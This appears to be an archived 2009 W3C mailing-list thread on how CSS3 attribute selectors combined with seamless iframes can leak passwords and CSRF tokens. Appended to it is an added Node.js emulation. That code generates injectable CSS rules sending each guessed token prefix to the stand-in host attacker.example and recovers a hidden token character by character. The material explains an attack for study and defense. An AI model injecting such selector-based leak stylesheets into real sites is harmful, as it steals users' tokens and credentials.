Re: Seamless iframes + CSS3 selectors = bad idea

Collin, this attack allows you to steal nonces, making CSRF protections less
effective. Seamless iframes make this work across ALL of the domain/origin.

greetings.

On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote:

A few thoughts:

* The password stealing attack can already be accomplished using the
iframe to create a login page and prompting the user to type their
password. It's not necessary to use CSS3 or seamless.
* If the password manager is used, CSS3 + seamless lets you steal the
password without user interaction.
* However, if you can inject arbitrary CSS3 and a seamless iframe into
a page, there's a good chance you can inject a password field, so this
password manager attack doesn't require seamless, just CSS3.
* Many webapps include a CSRF token in every page as a hidden form
field. If the page that allows CSS3 injection includes such a token,
you don't need seamless iframes to steal the token.

It seems like CSS3 is adding a lot of attack surface; sites may need
to block arbitrary CSS3 injection regardless of seamless. That is
unfortunate since browser vendors have been removing expression,
-moz-binding, and other features that make CSS injection dangerous.

On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see.  The issue is that t...

Received on Saturday, 5 December 2009 18:20:06 UTC
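The token-leak described in the thread, as an added example that is not part of the original messages or any W3C spec text. It emulates, in plain Node.js without a browser, the CSS3 attribute-selector trick Collin describes (one `[value^="..."]` rule per candidate character, each with a `background-image: url(...)` pointing at an attacker host) and the scoping point from the reply (with `seamless`, as the attribute was proposed at the time, the parent's stylesheet also cascades into same-origin framed documents). The victim origin, the two pages, the token value `k7Qz2pL9` and the collection endpoint `https://attacker.example/leak` are all constructed for the demo; the selector matching is a hand-written emulation of what a browser would do, not real CSS engine code.

```javascript
// Added example (not from the thread): emulate CSS3 attribute-selector
// exfiltration of a hidden CSRF token, with and without a seamless iframe.
// No browser is involved; selector matching is emulated in plain JS.

const ORIGIN = 'https://victim.example';            // constructed victim origin
const ATTACKER = 'https://attacker.example/leak';   // hypothetical collection endpoint
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

// Page where the attacker can inject CSS (and, if supported, a seamless
// iframe). It carries no token itself.
const PROFILE_PAGE = { origin: ORIGIN, elements: [
  { tag: 'input', attrs: { type: 'text', name: 'comment', value: '' } },
]};

// Same-origin page that emits the CSRF token as a hidden form field.
// The token value is made up for this demo.
const SETTINGS_PAGE = { origin: ORIGIN, elements: [
  { tag: 'input', attrs: { type: 'hidden', name: 'csrf_token', value: 'k7Qz2pL9' } },
]};

// One round of injected CSS: for a known prefix, one rule per candidate next
// character. At most one rule matches, and its background fetch tells the
// attacker which character came next.
function buildLeakRules(prefix, alphabet = ALPHABET) {
  return Array.from(alphabet, (ch) => {
    const guess = prefix + ch;
    return {
      guess,
      selector: `input[name="csrf_token"][value^="${guess}"]`,
      url: `${ATTACKER}?p=${encodeURIComponent(guess)}`,
    };
  });
}

// Render the rules as the stylesheet text the attacker would inject.
function rulesToCss(rules) {
  return rules
    .map((r) => `${r.selector} { background-image: url("${r.url}"); }`)
    .join('\n');
}

// Emulation of the selector shape used above: input[name="csrf_token"][value^=guess].
function matchesLeakSelector(el, rule) {
  return el.tag === 'input'
    && el.attrs.name === 'csrf_token'
    && typeof el.attrs.value === 'string'
    && el.attrs.value.startsWith(rule.guess);
}

// What the browser would fetch: the background URL of every rule that
// matches some styled element. The attacker reads these off its server log.
function requestsTriggered(elements, rules) {
  return rules
    .filter((r) => elements.some((el) => matchesLeakSelector(el, r)))
    .map((r) => r.url);
}

// Scoping point from the thread: without seamless, injected CSS only styles
// the injection page's own elements; with seamless (as proposed), the parent
// stylesheet also cascades into same-origin framed documents, so any page on
// the origin that carries the token becomes reachable.
function styledElements(injectionPage, framedPages, seamless) {
  const els = [...injectionPage.elements];
  if (seamless) {
    for (const page of framedPages) {
      if (page.origin === injectionPage.origin) els.push(...page.elements);
    }
  }
  return els;
}

// Drive the attack: one page load (one injected stylesheet) per recovered
// character. Stops when no candidate extends the prefix any further.
function recoverToken(elements, maxLen = 64) {
  let prefix = '';
  let rounds = 0;
  while (prefix.length < maxLen) {
    rounds++;
    const hits = requestsTriggered(elements, buildLeakRules(prefix));
    if (hits.length === 0) break;   // token complete (or absent from the styled DOM)
    prefix = new URL(hits[0]).searchParams.get('p');
  }
  return { token: prefix, rounds };
}

// Stand-alone run: show the three situations discussed in the thread.
console.log('injection page alone, no seamless :', recoverToken(styledElements(PROFILE_PAGE, [SETTINGS_PAGE], false)));
console.log('injection page + seamless iframe  :', recoverToken(styledElements(PROFILE_PAGE, [SETTINGS_PAGE], true)));
console.log('token already on injection page   :', recoverToken(SETTINGS_PAGE.elements));
console.log(rulesToCss(buildLeakRules('k7')).split('\n').slice(0, 2).join('\n'));
```

The three runs line up with the thread: when the injection page itself carries the hidden token, plain CSS3 injection is enough (Collin's last bullet); when the token lives on another page of the same origin, the seamless iframe is what brings those elements under the injected stylesheet (the reply's point about the whole origin). Each round costs the attacker one injected stylesheet of `alphabet.length` rules and leaks one character, so an 8-character token falls in 8 rounds plus one empty round. The emulation deliberately ignores details a real browser adds (whether the `value` attribute or the live value is matched, request deduplication, whether a matching rule actually fetches when the element is hidden); the conclusion the thread draws, that sites must prevent arbitrary CSS injection rather than rely on the token being out of sight, does not depend on those details.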